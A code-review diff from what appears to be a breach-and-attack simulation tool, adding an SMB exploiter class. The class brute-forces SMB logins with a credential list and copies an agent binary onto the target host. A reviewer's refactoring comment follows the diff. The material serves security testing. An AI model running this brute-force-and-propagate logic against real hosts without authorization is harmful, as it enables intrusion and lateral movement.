monkey/agent_plugins/exploiters/smb/src/smb_exploit_client.py

```diff
@@ -0,0 +1,203 @@
+import logging
+import ntpath
+from io import BytesIO
+from pathlib import PurePath
+from typing import Any, Dict, Iterable, Optional, Tuple
+
+# SMB
+from impacket.smbconnection import SMBConnection
+
+from common.credentials import Credentials
+from common.event_queue import IAgentEventPublisher
+from infection_monkey.exploit import IAgentBinaryRepository
+from infection_monkey.exploit.tools import generate_brute_force_credentials
+from infection_monkey.exploit.tools.helpers import get_agent_dst_path
+from infection_monkey.i_puppet import TargetHost
+
+from .smb_options import SMBOptions
+from .smb_utils import (
+    create_smb_connection,
+    logout_guest,
+    query_server_info,
+    query_shared_resources,
+    smb_login,
+)
+
+logger = logging.getLogger(__name__)
+
+
+class SMBExploitClient:
+    """Manages the SMB connection, Exploitation events"""
+
+    def __init__(
+        self,
+        agent_binary_repository: IAgentBinaryRepository,
+        agent_event_publisher: IAgentEventPublisher,
+        credentials: Iterable[Credentials],
+    ):
+        self._agent_binary_repository = agent_binary_repository
+        self._agent_event_publisher = agent_event_publisher
+        self._credentials = credentials
+        self._smb: Optional[SMBConnection] = None
+
+    def exploit(self, host: TargetHost, options: SMBOptions) -> Optional[Tuple[str, Credentials]]:
+        """Exploits a host using SMB. Returns the remote path of the agent binary."""
+        credentials = self.brute_force(host, options)
+        destination_path = get_agent_dst_path(host)
+        agent_binary = self._agent_binary_repository.get_agent_binary(host.operating_system)
+
+        remote_path = self.copy_agent(agent_binary, host, destination_path, credentials)
+        if not remote_path:
+            logger.debug(f"Failed to copy agent to {host}")
+            return None
+
+        return remote_path, credentials
+
+    def brute_force(self, host: TargetHost, options: SMBOptions) -> Optional[Credentials]:
+        """Brute force SMB login"""
+        credentials_list = generate_brute_force_credentials(self._credentials)
+        for credentials in credentials_list:
+            # TODO: Test if we only need to create the connection once
+            self._smb = create_smb_connection(host)
+            if not self._smb:
+                continue
+
+            self._smb = smb_login(self._smb, credentials)
+            if not self._smb:
+                continue
+
+            self._smb.setTimeout(options.smb_connect_timeout)
+
+            if logout_guest(self._smb):
+                continue
+
+            # At this point, we've successfully logged in with a non-guest user
+            # Can we break out of the loop here?
+            return credentials
```

Comment:
Could this be a separate method that tries to establish an smb connection to the host with given credentials? It should return the connection.